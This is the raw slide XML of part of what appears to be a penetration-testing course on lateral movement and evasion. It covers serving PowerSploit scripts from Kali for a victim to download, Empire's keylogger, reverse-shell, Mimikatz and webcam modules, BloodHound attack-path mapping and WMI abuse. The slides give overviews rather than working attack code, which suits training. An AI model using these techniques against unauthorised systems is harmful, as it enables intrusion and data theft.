                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Performs network and Windows domain enumeration and exploitation</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2891051752"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20408137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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="1088571"/>
            <a:ext cx="8924231"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When you use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, you typically expose the scripts launching a web service. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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The figure shows Kali Linux being used, with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> scripts located in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/share/windows-resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>powersploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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A simple web service is started using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> python3 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 1337</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> command (where 1337 is the port number). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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The compromised system then connects to the attacker’s machine (Kali) on port 1337 and downloads a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>PowerSploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> script for data exfiltration.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagem 6" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD5CDC7-9CD3-B06D-2EDF-390FEF733E61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960353" y="2825446"/>
            <a:ext cx="5492869" cy="1735477"/>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dirty="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14640475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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="1088571"/>
            <a:ext cx="5301137"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400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Empire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nother</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> PowerShell-based post-exploitation framework, which is an open-source framework that includes a PowerShell Windows agent and a Python Linux agent. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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It  implements the ability to run PowerShell agents without the need for powershell.exe.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>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It allows you to rapidly deploy post-exploitation modules including keyloggers, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bind shells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reverse shells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, and adaptable communications to evade detection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>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The figure shows one of the modules of Empire (a macOS X webcam snapshot). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This module takes a picture by using the webcam of a compromised macOS X system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagem 6" descr="Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9CEB7E3-561C-DD72-7EB0-CF85FF5A2525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551097" y="1087367"/>
            <a:ext cx="3444096" cy="3507919"/>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dirty="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24227952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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="1088571"/>
            <a:ext cx="8298816"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err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" err="1">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You can use a single-page JavaScript web application called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> that uses graph theory to reveal the hidden relationships in a Windows Active Directory environment. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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An attacker can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to identify numerous attack paths. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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Similarly, incident response teams can use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to detect and eliminate those same attack paths. </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dirty="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37171118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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10359F8A-B56A-3EB2-6C83-FB7410B44542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2311" y="1088571"/>
            <a:ext cx="8643872"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rgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Windows Management Instrumentation (WMI) for Post-Exploitation Tasks</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>It is used to manage data and operations on Windows operating systems. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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You can write WMI scripts or applications to automate administrative tasks on remote computers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="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WMI also provides functionality for data management to other parts of the operating system, including the System Center Operations Manager (formerly Microsoft Operations Manager [MOM]) and Windows Remote Management (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WinRM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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Malware can use WMI to perform different activities in a compromised system. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="140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For example, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nyeta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="181A1F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ransomware used WMI to perform administrative tasks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>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dirty="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
